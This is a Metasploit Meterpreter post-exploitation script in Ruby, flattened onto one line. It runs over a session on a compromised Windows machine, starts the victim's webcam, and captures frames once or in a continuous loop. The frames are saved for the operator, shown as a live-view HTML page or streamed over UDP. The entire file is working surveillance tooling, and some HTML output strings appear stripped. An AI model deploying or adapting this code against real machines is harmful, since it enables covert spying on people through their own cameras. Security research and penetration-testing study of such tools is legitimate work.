## # WARNING: Metasploit no longer maintains or accepts meterpreter scripts. # If you'd like to imporve this script, please try to port it as a post # module instead. Thank you. ## # Author: scriptjunkie # # Simplify running webcam, whether grabbing a single frame or running # a continous loop. @client = client opts = Rex::Parser::Arguments.new( "-h" => [ false, "Help menu" ], "-f" => [ false, "Just grab single frame"], "-l" => [ false, "Keep capturing in a loop (default)" ], "-d" => [ true, "Loop delay interval (in ms, default 1000)" ], "-i" => [ true, "The index of the webcam to use (Default: 1)" ], "-q" => [ true, "The JPEG image quality (Default: 50)" ], "-g" => [ false, "Send to GUI instead of writing to file" ], "-s" => [ true, "Stop recording" ], "-p" => [ true, "The path to the folder images will be saved in (Default: current working directory)" ], "-a" => [ false, "Store copies of all the images capture instead of overwriting the same file (Default: overwrite single file)" ] ) iterator = 0 folderpath = "." single = false quality = 50 index = 1 interval = 1000 gui = false saveAll = false opts.parse(args) { |opt, idx, val| case opt when "-h" print_line "webcam -- view webcam over session" print_line(opts.usage) raise Rex::Script::Completed when "-f" single = true when "-l" single = false when "-d" interval = val.to_i when "-i" index = val.to_i when "-q" quality = val.to_i when "-g" gui = true when "-p" folderpath = val when "-s" print_line("[*] Stopping webcam") client.webcam.webcam_stop raise Rex::Script::Completed when "-a" saveAll = true end } if client.platform != 'windows' print_error("This version of Meterpreter is not supported with this Script!") raise Rex::Script::Completed end begin camlist = client.webcam.webcam_list if camlist.length == 0 print_error("Error: no webcams found!") raise Rex::Script::Completed elsif camlist.length < index print_error("Error: only #{camlist.length} webcams found!") raise Rex::Script::Completed end print_line("[*] Starting webcam #{index}: #{camlist[index - 1]}") client.webcam.webcam_start(index) #prepare output if(gui) sock = Rex::Socket::Udp.create( 'PeerHost' => "", 'PeerPort' => 16235 ) end imagepath = folderpath + ::File::SEPARATOR + "webcam-" + iterator.to_s.rjust(5, "0") + ".jpg" print_line( "[*] imagepath is #{imagepath}" ) htmlpath = folderpath + ::File::SEPARATOR + "webcam.htm" begin if single == true data = client.webcam.webcam_get_frame(quality) if(gui) sock.write(data) else ::File.open( imagepath, 'wb' ) do |fd| fd.write( data ) end path = ::File.expand_path( imagepath ) print_line( "[*] Image saved to : #{path}" ) Rex::Compat.open_file( path ) end else if(!gui) ::File.open(htmlpath, 'wb' ) do |fd| htmlOut = "
" fd.write(htmlOut) end print_line( "[*] View live stream at: #{htmlpath}" ) Rex::Compat.open_file(htmlpath) print_line( "[*] Image saved to : #{imagepath}" ) end while true do data = client.webcam.webcam_get_frame(quality) if(gui) sock.write(data) else ::File.open( imagepath, 'wb' ) do |fd| fd.write( data ) ::File.open(htmlpath, 'wb' ) do |fd| htmlOut = "" fd.write(htmlOut) if(saveAll) iterator = iterator + 1 imagepath = folderpath + ::File::SEPARATOR + "webcam-" + iterator.to_s.rjust(5, "0") + ".jpg" end end end end select(nil, nil, nil, interval/1000.0) end end rescue ::Interrupt rescue ::Exception => e print_error("Error getting frame: #{e.class} #{e} #{e.backtrace}") end print_line("[*] Stopping webcam") client.webcam.webcam_stop sock.close if sock != nil rescue ::Exception => e print_error("Error: #{e.class} #{e} #{e.backtrace}") end